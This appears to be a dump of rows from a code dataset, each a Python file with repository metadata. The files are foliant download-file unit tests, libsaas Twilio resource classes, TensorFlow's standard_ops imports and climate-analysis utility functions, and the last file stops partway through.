if __name__ == "__main__":
doctest.testmod() # pragma: no cover
| 33.557218 | 92 | 0.440728 | 4,937 | 38,121 | 3.332388 | 0.054081 | 0.019815 | 0.020058 | 0.033613 | 0.744104 | 0.721736 | 0.710005 | 0.703319 | 0.686725 | 0.684658 | 0 | 0.028745 | 0.347499 | 38,121 | 1,135 | 93 | 33.586784 | 0.632669 | 0.554943 | 0 | 0.296748 | 0 | 0 | 0.008636 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.341463 | false | 0 | 0.020325 | 0.02439 | 0.747967 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 |
0
| 6 |
8a54efc9a7ad3665cabc7b4468043314dcb3122b
| 3,743 |
py
|
Python
|
test/test_downloadfile.py
|
foliant-docs/foliantcontrib.downloadfile
|
1af9481f9bc9142d8b1ac1eff93fa0c5577ccaec
|
[
"MIT"
] | null | null | null |
test/test_downloadfile.py
|
foliant-docs/foliantcontrib.downloadfile
|
1af9481f9bc9142d8b1ac1eff93fa0c5577ccaec
|
[
"MIT"
] | null | null | null |
test/test_downloadfile.py
|
foliant-docs/foliantcontrib.downloadfile
|
1af9481f9bc9142d8b1ac1eff93fa0c5577ccaec
|
[
"MIT"
] | null | null | null |
import shutil
from pathlib import Path
from unittest import TestCase
from unittest.mock import Mock
from unittest.mock import patch
from foliant.config.downloadfile import download_file
from foliant.config.downloadfile import get_file_ext_from_url
from foliant.config.downloadfile import get_file_name_from_url
class TestDownloadFile(TestCase):
def setUp(self):
self.project_dir = (Path(__file__).parent / 'project_dir').resolve()
self.project_dir.mkdir(exist_ok=True)
def tearDown(self):
shutil.rmtree(self.project_dir, ignore_errors=True)
@patch('foliant.config.downloadfile.urlopen', autospec=True)
def test_only_url(self, urlopen):
mock_response = Mock()
mock_response.read.return_value = b'File content'
urlopen.return_value = mock_response
url = 'http://example.com/myfile.txt'
download_file(root_dir=self.project_dir, url=url)
request = urlopen.call_args.args[0]
context = urlopen.call_args.kwargs['context']
self.assertEqual(request.headers, {})
self.assertIsNone(context)
with open(self.project_dir / 'myfile.txt') as f:
self.assertEqual(f.read(), 'File content')
@patch('foliant.config.downloadfile.urlopen', autospec=True)
def test_save_to(self, urlopen):
mock_response = Mock()
mock_response.read.return_value = b'File content'
urlopen.return_value = mock_response
url = 'http://example.com/myfile.txt'
save_to = 'subdir1/subdir2/downloaded.txt'
download_file(root_dir=self.project_dir, url=url, save_to=save_to)
request = urlopen.call_args.args[0]
context = urlopen.call_args.kwargs['context']
self.assertEqual(request.headers, {})
self.assertIsNone(context)
with open(self.project_dir / save_to) as f:
self.assertEqual(f.read(), 'File content')
@patch('foliant.config.downloadfile.urlopen', autospec=True)
def test_with_auth(self, urlopen):
mock_response = Mock()
mock_response.read.return_value = b'File content'
urlopen.return_value = mock_response
url = 'http://example.com/myfile.txt'
download_file(
root_dir=self.project_dir,
url=url,
login='john',
password='qwerty1234'
)
request = urlopen.call_args.args[0]
context = urlopen.call_args.kwargs['context']
self.assertIn('Authorization', request.headers)
self.assertIsNone(context)
with open(self.project_dir / 'myfile.txt') as f:
self.assertEqual(f.read(), 'File content')
class TestGetFileNameFromURL(TestCase):
def test_with_ext(self):
url = 'http://example.com/sub/myfile.txt'
name = get_file_name_from_url(url)
self.assertEqual(name, 'myfile.txt')
def test_no_ext(self):
url = 'http://example.com/sub/myfile'
name = get_file_name_from_url(url)
self.assertEqual(name, 'myfile')
def test_with_clutter(self):
url = 'http://example.com/sub/myfile.txt?param=val&foo=bar'
name = get_file_name_from_url(url)
self.assertEqual(name, 'myfile.txt')
class TestGetFileExtFromURL(TestCase):
def test_with_ext(self):
url = 'http://example.com/sub/myfile.txt'
ext = get_file_ext_from_url(url)
self.assertEqual(ext, '.txt')
def test_no_ext(self):
url = 'http://example.com/sub/myfile'
ext = get_file_ext_from_url(url)
self.assertEqual(ext, '')
def test_with_clutter(self):
url = 'http://example.com/sub/myfile.txt?param=val&foo=bar'
ext = get_file_ext_from_url(url)
self.assertEqual(ext, '.txt')
| 32.833333 | 76 | 0.663906 | 480 | 3,743 | 4.972917 | 0.177083 | 0.041475 | 0.052786 | 0.064097 | 0.804357 | 0.780897 | 0.780897 | 0.745706 | 0.745706 | 0.722246 | 0 | 0.003081 | 0.21961 | 3,743 | 113 | 77 | 33.123894 | 0.814105 | 0 | 0 | 0.623529 | 0 | 0 | 0.169116 | 0.036067 | 0 | 0 | 0 | 0 | 0.176471 | 1 | 0.129412 | false | 0.011765 | 0.094118 | 0 | 0.258824 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
8a7777964dadf66bcb5c8207f5f26c1301e49cee
| 3,977 |
py
|
Python
|
libsaas/services/twilio/applications.py
|
MidtownFellowship/libsaas
|
541bb731b996b08ede1d91a235cb82895765c38a
|
[
"MIT"
] | 155 |
2015-01-27T15:17:59.000Z
|
2022-02-20T00:14:08.000Z
|
libsaas/services/twilio/applications.py
|
MidtownFellowship/libsaas
|
541bb731b996b08ede1d91a235cb82895765c38a
|
[
"MIT"
] | 14 |
2015-01-12T08:22:37.000Z
|
2021-06-16T19:49:31.000Z
|
libsaas/services/twilio/applications.py
|
MidtownFellowship/libsaas
|
541bb731b996b08ede1d91a235cb82895765c38a
|
[
"MIT"
] | 43 |
2015-01-28T22:41:45.000Z
|
2021-09-21T04:44:26.000Z
|
from libsaas import http, parsers
from libsaas.services import base
from libsaas.services.twilio import resource
class ApplicationsBase(resource.TwilioResource):
path = 'Applications'
class Application(ApplicationsBase):
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class Applications(ApplicationsBase):
@base.apimethod
def get(self, FriendlyName=None, Page=None, PageSize=None, AfterSid=None):
"""
Fetch the Applications belonging to an account.
:var FriendlyName: Only return the Account resources with friendly
names that exactly match this name.
:vartype FriendlyName: str
:var Page: The current page number. Zero-indexed, so the first page
is 0.
:vartype Page: int
:var PageSize: How many resources to return in each list page.
The default is 50, and the maximum is 1000.
:vartype PageSize: int
:var AfterSid: The last Sid returned in the previous page, used to
avoid listing duplicated resources if new ones are created while
paging.
:vartype AfterSid: str
"""
params = resource.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class ConnectAppsBase(resource.TwilioResource):
path = 'ConnectApps'
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class ConnectApp(ConnectAppsBase):
pass
class ConnectApps(ConnectAppsBase):
@base.apimethod
def get(self, Page=None, PageSize=None, AfterSid=None):
"""
Fetch the Connect Apps belonging to an account.
:var Page: The current page number. Zero-indexed, so the first page
is 0.
:vartype Page: int
:var PageSize: How many resources to return in each list page.
The default is 50, and the maximum is 1000.
:vartype PageSize: int
:var AfterSid: The last Sid returned in the previous page, used to
avoid listing duplicated resources if new ones are created while
paging.
:vartype AfterSid: str
"""
params = resource.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
class AuthorizedConnectAppsBase(resource.TwilioResource):
path = 'AuthorizedConnectApps'
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class AuthorizedConnectApp(AuthorizedConnectAppsBase):
pass
class AuthorizedConnectApps(AuthorizedConnectAppsBase):
@base.apimethod
def get(self, Page=None, PageSize=None, AfterSid=None):
"""
Fetch the Authorized Connect Apps belonging to an account.
:var Page: The current page number. Zero-indexed, so the first page
is 0.
:vartype Page: int
:var PageSize: How many resources to return in each list page.
The default is 50, and the maximum is 1000.
:vartype PageSize: int
:var AfterSid: The last Sid returned in the previous page, used to
avoid listing duplicated resources if new ones are created while
paging.
:vartype AfterSid: str
"""
params = resource.get_params(None, locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_json
| 28.007042 | 78 | 0.652753 | 458 | 3,977 | 5.648472 | 0.220524 | 0.027831 | 0.048705 | 0.0661 | 0.752223 | 0.734441 | 0.734441 | 0.730576 | 0.695787 | 0.67298 | 0 | 0.007187 | 0.265275 | 3,977 | 141 | 79 | 28.205674 | 0.878166 | 0.378175 | 0 | 0.68 | 0 | 0 | 0.024778 | 0.009818 | 0 | 0 | 0 | 0 | 0 | 1 | 0.24 | false | 0.04 | 0.06 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 |
0
| 6 |
8a8c957af09c1662e1613d8819301ef9871bcd5c
| 5,914 |
py
|
Python
|
tensorflow/python/ops/standard_ops.py
|
ashutom/tensorflow-upstream
|
c16069c19de9e286dd664abb78d0ea421e9f32d4
|
[
"Apache-2.0"
] | 8 |
2021-08-03T03:57:10.000Z
|
2021-12-13T01:19:02.000Z
|
tensorflow/python/ops/standard_ops.py
|
CaptainGizzy21/tensorflow
|
3457a2b122e50b4d44ceaaed5a663d635e5c22df
|
[
"Apache-2.0"
] | 17 |
2021-08-12T19:38:42.000Z
|
2022-01-27T14:39:35.000Z
|
tensorflow/python/ops/standard_ops.py
|
CaptainGizzy21/tensorflow
|
3457a2b122e50b4d44ceaaed5a663d635e5c22df
|
[
"Apache-2.0"
] | 4 |
2022-01-13T11:23:44.000Z
|
2022-03-02T11:11:42.000Z
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=unused-import
"""Import names of Tensor Flow standard Ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import platform as _platform
import sys as _sys
from tensorflow.python import autograph
from tensorflow.python.training.experimental import loss_scaling_gradient_tape
# pylint: disable=g-bad-import-order
# Imports the following modules so that @RegisterGradient get executed.
from tensorflow.python.ops import array_grad
from tensorflow.python.ops import cudnn_rnn_grad
from tensorflow.python.ops import data_flow_grad
from tensorflow.python.ops import manip_grad
from tensorflow.python.ops import math_grad
from tensorflow.python.ops import random_grad
from tensorflow.python.ops import rnn_grad
from tensorflow.python.ops import sparse_grad
from tensorflow.python.ops import state_grad
from tensorflow.python.ops import tensor_array_grad
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.array_ops import * # pylint: disable=redefined-builtin
from tensorflow.python.ops.check_ops import *
from tensorflow.python.ops.clip_ops import *
from tensorflow.python.ops.special_math_ops import *
# TODO(vrv): Switch to import * once we're okay with exposing the module.
from tensorflow.python.ops.confusion_matrix import confusion_matrix
from tensorflow.python.ops.control_flow_ops import Assert
from tensorflow.python.ops.control_flow_ops import case
from tensorflow.python.ops.control_flow_ops import cond
from tensorflow.python.ops.control_flow_ops import group
from tensorflow.python.ops.control_flow_ops import no_op
from tensorflow.python.ops.control_flow_ops import tuple # pylint: disable=redefined-builtin
# pylint: enable=redefined-builtin
from tensorflow.python.eager import wrap_function
from tensorflow.python.ops.control_flow_ops import while_loop
from tensorflow.python.ops.batch_ops import *
from tensorflow.python.ops.critical_section_ops import *
from tensorflow.python.ops.data_flow_ops import *
from tensorflow.python.ops.functional_ops import *
from tensorflow.python.ops.gradients import *
from tensorflow.python.ops.histogram_ops import *
from tensorflow.python.ops.init_ops import *
from tensorflow.python.ops.io_ops import *
from tensorflow.python.ops.linalg_ops import *
from tensorflow.python.ops.logging_ops import Print
from tensorflow.python.ops.logging_ops import get_summary_op
from tensorflow.python.ops.logging_ops import timestamp
from tensorflow.python.ops.lookup_ops import initialize_all_tables
from tensorflow.python.ops.lookup_ops import tables_initializer
from tensorflow.python.ops.manip_ops import *
from tensorflow.python.ops.math_ops import * # pylint: disable=redefined-builtin
from tensorflow.python.ops.numerics import *
from tensorflow.python.ops.parsing_ops import *
from tensorflow.python.ops.partitioned_variables import *
from tensorflow.python.ops.proto_ops import *
from tensorflow.python.ops.ragged import ragged_dispatch as _ragged_dispatch
from tensorflow.python.ops.ragged import ragged_operators as _ragged_operators
from tensorflow.python.ops.random_ops import *
from tensorflow.python.ops.script_ops import py_func
from tensorflow.python.ops.session_ops import *
from tensorflow.python.ops.sort_ops import *
from tensorflow.python.ops.sparse_ops import *
from tensorflow.python.ops.state_ops import assign
from tensorflow.python.ops.state_ops import assign_add
from tensorflow.python.ops.state_ops import assign_sub
from tensorflow.python.ops.state_ops import count_up_to
from tensorflow.python.ops.state_ops import scatter_add
from tensorflow.python.ops.state_ops import scatter_div
from tensorflow.python.ops.state_ops import scatter_mul
from tensorflow.python.ops.state_ops import scatter_sub
from tensorflow.python.ops.state_ops import scatter_min
from tensorflow.python.ops.state_ops import scatter_max
from tensorflow.python.ops.state_ops import scatter_update
from tensorflow.python.ops.state_ops import scatter_nd_add
from tensorflow.python.ops.state_ops import scatter_nd_sub
# TODO(simister): Re-enable once binary size increase due to scatter_nd
# ops is under control.
# from tensorflow.python.ops.state_ops import scatter_nd_mul
# from tensorflow.python.ops.state_ops import scatter_nd_div
from tensorflow.python.ops.state_ops import scatter_nd_update
from tensorflow.python.ops.stateless_random_ops import *
from tensorflow.python.ops.string_ops import *
from tensorflow.python.ops.template import *
from tensorflow.python.ops.tensor_array_ops import *
from tensorflow.python.ops.variable_scope import * # pylint: disable=redefined-builtin
from tensorflow.python.ops.variables import *
from tensorflow.python.ops.parallel_for.control_flow_ops import vectorized_map
# pylint: disable=g-import-not-at-top
if _platform.system() == "Windows":
from tensorflow.python.compiler.tensorrt import trt_convert_windows as trt
else:
from tensorflow.python.compiler.tensorrt import trt_convert as trt
# pylint: enable=g-import-not-at-top
# pylint: enable=wildcard-import
# pylint: enable=g-bad-import-order
# These modules were imported to set up RaggedTensor operators and dispatchers:
del _ragged_dispatch, _ragged_operators
| 46.936508 | 93 | 0.825668 | 875 | 5,914 | 5.410286 | 0.244571 | 0.227714 | 0.325306 | 0.34981 | 0.5921 | 0.53929 | 0.367343 | 0.277989 | 0.118293 | 0.025771 | 0 | 0.001496 | 0.095536 | 5,914 | 125 | 94 | 47.312 | 0.88353 | 0.263274 | 0 | 0 | 0 | 0 | 0.001621 | 0 | 0 | 0 | 0 | 0.008 | 0.012048 | 1 | 0 | true | 0 | 0.963855 | 0 | 0.963855 | 0.012048 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
0a06508cf532e568943c2d6f9f6d327c4504fc73
| 56 |
py
|
Python
|
starry/_core/ops/lib/include/oblate/tests/test_derivs.py
|
rodluger/starry
|
da7fee48c5ef94278f0047be0579e2f13492cdd5
|
[
"MIT"
] | 116 |
2018-02-23T19:47:15.000Z
|
2022-02-21T04:43:46.000Z
|
starry/_core/ops/lib/include/oblate/tests/test_derivs.py
|
rodluger/starry
|
da7fee48c5ef94278f0047be0579e2f13492cdd5
|
[
"MIT"
] | 224 |
2018-02-26T00:41:51.000Z
|
2022-03-29T10:38:16.000Z
|
starry/_core/ops/lib/include/oblate/tests/test_derivs.py
|
rodluger/starry
|
da7fee48c5ef94278f0047be0579e2f13492cdd5
|
[
"MIT"
] | 25 |
2018-02-26T18:14:36.000Z
|
2021-11-30T01:00:56.000Z
|
import oblate
import numpy as np
import pytest
# TODO!
| 9.333333 | 18 | 0.767857 | 9 | 56 | 4.777778 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.196429 | 56 | 5 | 19 | 11.2 | 0.955556 | 0.089286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
0a33cb634cfe076d601a3145a01487981499f068
| 22,712 |
py
|
Python
|
Scripts/calc_Utilities.py
|
zmlabe/ThicknessSensitivity
|
6defdd897a61d7d1a02f34a9f4ec92b2b17b3075
|
[
"MIT"
] | 1 |
2017-10-22T02:22:14.000Z
|
2017-10-22T02:22:14.000Z
|
Scripts/calc_Utilities.py
|
zmlabe/ThicknessSensitivity
|
6defdd897a61d7d1a02f34a9f4ec92b2b17b3075
|
[
"MIT"
] | null | null | null |
Scripts/calc_Utilities.py
|
zmlabe/ThicknessSensitivity
|
6defdd897a61d7d1a02f34a9f4ec92b2b17b3075
|
[
"MIT"
] | 4 |
2018-04-05T17:55:36.000Z
|
2022-03-31T07:05:01.000Z
|
"""
Functions are useful untilities for SITperturb experiments
Notes
-----
Author : Zachary Labe
Date : 13 August 2017
Usage
-----
[1] calcDecJan(varx,vary,lat,lon,level,levsq)
[2] calcDecJanFeb(varx,vary,lat,lon,level,levsq)
[3] calc_indttest(varx,vary)
[4] calc_weightedAve(var,lats)
[5] calc_spatialCorr(varx,vary,lats,lons,weight)
[6] calc_RMSE(varx,vary,lats,lons,weight)
[7] calc_spatialCorrHeight(varx,vary,lats,lons,weight)
[8] calc_spatialCorrHeightLev(varx,vary,lats,lons,weight,levelq)
"""
def calcDecJan(varx,vary,lat,lon,level,levsq):
"""
Function calculates average for December-January
Parameters
----------
varx : 4d array or 5d array
[year,month,lat,lon] or [year,month,lev,lat,lon]
vary : 4d array or 5d array
[year,month,lat,lon] or [year,month,lev,lat,lon]
lat : 1d numpy array
latitudes
lon : 1d numpy array
longitudes
level : string
Height of variable (surface or profile)
levsq : integer
number of levels
Returns
-------
varx_dj : 3d array or 4d array
[year,lat,lon] or [year,lev,lat,lon]
vary_dj : 3d array
[year,lat,lon] or [year,lev,lat,lon]
Usage
-----
varx_dj,vary_dj = calcDecJan(varx,vary,lat,lon,level,levsq)
"""
print('\n>>> Using calcDecJan function!')
### Import modules
import numpy as np
### Reshape for 3d variables
if level == 'surface':
varxravel = np.reshape(varx.copy(),
(int(varx.shape[0]*12),
int(lat.shape[0]),int(lon.shape[0])))
varyravel = np.reshape(vary.copy(),
(int(vary.shape[0]*12),
int(lat.shape[0]),int(lon.shape[0])))
varx_dj = np.empty((varx.shape[0]-1,lat.shape[0],lon.shape[0]))
vary_dj = np.empty((vary.shape[0]-1,lat.shape[0],lon.shape[0]) )
for i in range(0,varxravel.shape[0]-12,12):
counter = 0
if i >= 12:
counter = i//12
djappendh = np.append(varxravel[11+i,:,:],varxravel[12+i,:,:])
djappendf = np.append(varyravel[11+i,:,:],varyravel[12+i,:,:])
varx_dj[counter,:,:] = np.nanmean(np.reshape(djappendh,
(2,int(lat.shape[0]),int(lon.shape[0]))),
axis=0)
vary_dj[counter,:,:] = np.nanmean(np.reshape(djappendf,
(2,int(lat.shape[0]),int(lon.shape[0]))),
axis=0)
### Reshape for 4d variables
elif level == 'profile':
varxravel = np.reshape(varx.copy(),
(int(varx.shape[0]*12.),levsq,
int(lat.shape[0]),int(lon.shape[0])))
varyravel = np.reshape(vary.copy(),
(int(vary.shape[0]*12.),levsq,
int(lat.shape[0]),int(lon.shape[0])))
varx_dj = np.empty((int(varx.shape[0]-1),levsq,
int(lat.shape[0]),int(lon.shape[0])))
vary_dj = np.empty((int(vary.shape[0]-1),levsq,
int(lat.shape[0]),int(lon.shape[0])) )
for i in range(0,varxravel.shape[0]-12,12):
counter = 0
if i >= 12:
counter = i//12
djappendh = np.append(varxravel[11+i,:,:,:],
varxravel[12+i,:,:,:])
djappendf = np.append(varyravel[11+i,:,:,:],
varyravel[12+i,:,:,:])
varx_dj[counter,:,:] = np.nanmean(np.reshape(djappendh,
(2,levsq,int(lat.shape[0]),
int(lon.shape[0]))),axis=0)
vary_dj[counter,:,:] = np.nanmean(np.reshape(djappendf,
(2,levsq,int(lat.shape[0]),
int(lon.shape[0]))),axis=0)
else:
print(ValueError('Selected wrong height - (surface or profile!)!'))
print('Completed: Organized data by months (ON,DJ,FM)!')
print('*Completed: Finished calcDecJan function!')
return varx_dj,vary_dj
###############################################################################
###############################################################################
###############################################################################
def calcDecJanFeb(varx,vary,lat,lon,level,levsq):
"""
Function calculates average for December-January-February
Parameters
----------
varx : 4d array or 5d array
[year,month,lat,lon] or [year,month,lev,lat,lon]
vary : 4d array or 5d array
[year,month,lat,lon] or [year,month,lev,lat,lon]
lat : 1d numpy array
latitudes
lon : 1d numpy array
longitudes
level : string
Height of variable (surface or profile)
levsq : integer
number of levels
Returns
-------
varx_djf : 3d array or 4d array
[year,lat,lon] or [year,lev,lat,lon]
vary_djf : 3d array
[year,lat,lon] or [year,lev,lat,lon]
Usage
-----
varx_djf,vary_djf = calcDecJanFeb(varx,vary,lat,lon,level,levsq)
"""
print('\n>>> Using calcDecJan function!')
### Import modules
import numpy as np
### Reshape for 3d variables
if level == 'surface':
varxravel = np.reshape(varx.copy(),
(int(varx.shape[0]*12),
int(lat.shape[0]),int(lon.shape[0])))
varyravel = np.reshape(vary.copy(),
(int(vary.shape[0]*12),
int(lat.shape[0]),int(lon.shape[0])))
varx_djf = np.empty((varx.shape[0]-1,lat.shape[0],lon.shape[0]))
vary_djf = np.empty((vary.shape[0]-1,lat.shape[0],lon.shape[0]) )
for i in range(0,varxravel.shape[0]-12,12):
counter = 0
if i >= 12:
counter = i//12
djfappendh1 = np.append(varxravel[11+i,:,:],varxravel[12+i,:,:])
djfappendf1 = np.append(varyravel[11+i,:,:],varyravel[12+i,:,:])
djfappendh = np.append(djfappendh1,varxravel[13+i,:,:])
djfappendf = np.append(djfappendf1,varyravel[13+i,:,:])
varx_djf[counter,:,:] = np.nanmean(np.reshape(djfappendh,
(3,int(lat.shape[0]),int(lon.shape[0]))),
axis=0)
vary_djf[counter,:,:] = np.nanmean(np.reshape(djfappendf,
(3,int(lat.shape[0]),int(lon.shape[0]))),
axis=0)
### Reshape for 4d variables
elif level == 'profile':
varxravel = np.reshape(varx.copy(),
(int(varx.shape[0]*12.),levsq,
int(lat.shape[0]),int(lon.shape[0])))
varyravel = np.reshape(vary.copy(),
(int(vary.shape[0]*12.),levsq,
int(lat.shape[0]),int(lon.shape[0])))
varx_djf = np.empty((int(varx.shape[0]-1),levsq,
int(lat.shape[0]),int(lon.shape[0])))
vary_djf = np.empty((int(vary.shape[0]-1),levsq,
int(lat.shape[0]),int(lon.shape[0])) )
for i in range(0,varxravel.shape[0]-12,12):
counter = 0
if i >= 12:
counter = i//12
djfappendh1 = np.append(varxravel[11+i,:,:,:],
varxravel[12+i,:,:,:])
djfappendf1 = np.append(varyravel[11+i,:,:,:],
varyravel[12+i,:,:,:])
djfappendh = np.append(djfappendh1,
varxravel[13+i,:,:,:])
djfappendf = np.append(djfappendf1,
varyravel[13+i,:,:,:])
varx_djf[counter,:,:] = np.nanmean(np.reshape(djfappendh,
(3,levsq,int(lat.shape[0]),
int(lon.shape[0]))),axis=0)
vary_djf[counter,:,:] = np.nanmean(np.reshape(djfappendf,
(3,levsq,int(lat.shape[0]),
int(lon.shape[0]))),axis=0)
else:
print(ValueError('Selected wrong height - (surface or profile!)!'))
print('Completed: Organized data by months (DJF)!')
print('*Completed: Finished calcDecJanFeb function!')
return varx_djf,vary_djf
###############################################################################
###############################################################################
###############################################################################
def calc_indttest(varx,vary):
"""
Function calculates statistical difference for 2 independent
sample t-test
Parameters
----------
varx : 3d array
vary : 3d array
Returns
-------
stat = calculated t-statistic
pvalue = two-tailed p-value
Usage
-----
stat,pvalue = calc_ttest(varx,vary)
"""
print('\n>>> Using calc_ttest function!')
### Import modules
import numpy as np
import scipy.stats as sts
### 2-independent sample t-test
stat,pvalue = sts.ttest_ind(varx,vary,nan_policy='omit')
### Significant at 95% confidence level
pvalue[np.where(pvalue >= 0.05)] = np.nan
pvalue[np.where(pvalue < 0.05)] = 1.
print('*Completed: Finished calc_ttest function!')
return stat,pvalue
###############################################################################
###############################################################################
###############################################################################
def calc_weightedAve(var,lats):
"""
Area weights sit array 5d [ens,year,month,lat,lon] into [ens,year,month]
Parameters
----------
var : 5d,4d,3d array of a gridded variable
lats : 2d array of latitudes
Returns
-------
meanvar : weighted average for 3d,2d,1d array
Usage
-----
meanvar = calc_weightedAve(var,lats)
"""
print('\n>>> Using calc_weightedAve function!')
### Import modules
import numpy as np
### Calculate weighted average for various dimensional arrays
if var.ndim == 5:
meanvar = np.empty((var.shape[0],var.shape[1],var.shape[2]))
for ens in range(var.shape[0]):
for i in range(var.shape[1]):
for j in range(var.shape[2]):
varq = var[ens,i,j,:,:]
mask = np.isfinite(varq) & np.isfinite(lats)
varmask = varq[mask]
areamask = np.cos(np.deg2rad(lats[mask]))
meanvar[ens,i,j] = np.nansum(varmask*areamask) \
/np.sum(areamask)
elif var.ndim == 4:
meanvar = np.empty((var.shape[0],var.shape[1]))
for i in range(var.shape[0]):
for j in range(var.shape[1]):
varq = var[i,j,:,:]
mask = np.isfinite(varq) & np.isfinite(lats)
varmask = varq[mask]
areamask = np.cos(np.deg2rad(lats[mask]))
meanvar[i,j] = np.nansum(varmask*areamask)/np.sum(areamask)
elif var.ndim == 3:
meanvar = np.empty((var.shape[0]))
for i in range(var.shape[0]):
varq = var[i,:,:]
mask = np.isfinite(varq) & np.isfinite(lats)
varmask = varq[mask]
areamask = np.cos(np.deg2rad(lats[mask]))
meanvar[i] = np.nansum(varmask*areamask)/np.sum(areamask)
elif var.ndim == 2:
meanvar = np.empty((var.shape[0]))
varq = var[:,:]
mask = np.isfinite(varq) & np.isfinite(lats)
varmask = varq[mask]
areamask = np.cos(np.deg2rad(lats[mask]))
meanvar = np.nansum(varmask*areamask)/np.sum(areamask)
else:
print(ValueError('Variable has the wrong dimensions!'))
print('Completed: Weighted variable average!')
print('*Completed: Finished calc_weightedAve function!')
return meanvar
###############################################################################
###############################################################################
###############################################################################
def calc_spatialCorr(varx,vary,lats,lons,weight):
"""
Calculates spatial correlation from pearson correlation coefficient
Parameters
----------
varx : 2d array
vary : 2d array
lats : 1d array
lons : 1d array of latitude
weight : string (yes or no)
Returns
-------
corrcoef : 1d array of correlation coefficient (pearson r)
Usage
-----
corrcoef = calc_spatialCorr(varx,vary,lats,lons)
"""
print('\n>>> Using calc_spatialCorr function!')
### Import modules
import numpy as np
if weight == 'yes': # Computed weighted correlation coefficient
### mask
mask = 'yes'
if mask == 'yes':
latq = np.where(lats > 40)[0]
lats = lats[latq]
varx = varx[latq,:]
vary = vary[latq,:]
print('MASKING LATITUDES!')
### Create 2d meshgrid for weights
lon2,lat2 = np.meshgrid(lons,lats)
### Create 2d array of weights based on latitude
gw = np.cos(np.deg2rad(lat2))
def m(x, w):
"""Weighted Mean"""
wave = np.sum(x * w) / np.sum(w)
print('Completed: Computed weighted average!')
return wave
def cov(x, y, w):
"""Weighted Covariance"""
wcov = np.sum(w * (x - m(x, w)) * (y - m(y, w))) / np.sum(w)
print('Completed: Computed weighted covariance!')
return wcov
def corr(x, y, w):
"""Weighted Correlation"""
wcor = cov(x, y, w) / np.sqrt(cov(x, x, w) * cov(y, y, w))
print('Completed: Computed weighted correlation!')
return wcor
corrcoef = corr(varx,vary,gw)
elif weight == 'no':
### Correlation coefficient from numpy function (not weighted)
corrcoef= np.corrcoef(varx.ravel(),vary.ravel())[0][1]
print('Completed: Computed NON-weighted correlation!')
else:
ValueError('Wrong weighted arguement in function!')
print('*Completed: Finished calc_SpatialCorr function!')
return corrcoef
###############################################################################
###############################################################################
###############################################################################
def calc_RMSE(varx,vary,lats,lons,weight):
"""
Calculates root mean square weighted average
Parameters
----------
varx : 2d array
vary : 2d array
lons : 1d array of latitude
weight : string (yes or no)
Returns
-------
rmse : 1d array
Usage
-----
rmse = calc_RMSE(varx,vary,lats,lons)
"""
print('\n>>> Using calc_RMSE function!')
### Import modules
import numpy as np
from sklearn.metrics import mean_squared_error
if weight == 'yes': # Computed weighted correlation coefficient
### mask
mask = 'yes'
if mask == 'yes':
latq = np.where(lats > 40)[0]
lats = lats[latq]
varx = varx[latq,:]
vary = vary[latq,:]
print('MASKING LATITUDES!')
### Create 2d meshgrid for weights
lon2,lat2 = np.meshgrid(lons,lats)
### Create 2d array of weights based on latitude
gw = np.cos(np.deg2rad(lat2))
### Calculate rmse
sq_err = (varx - vary)**2
rmse = np.sqrt((np.sum(sq_err*gw))/np.sum(gw))
elif weight == 'no':
### Root mean square error from sklearn (not weighted)
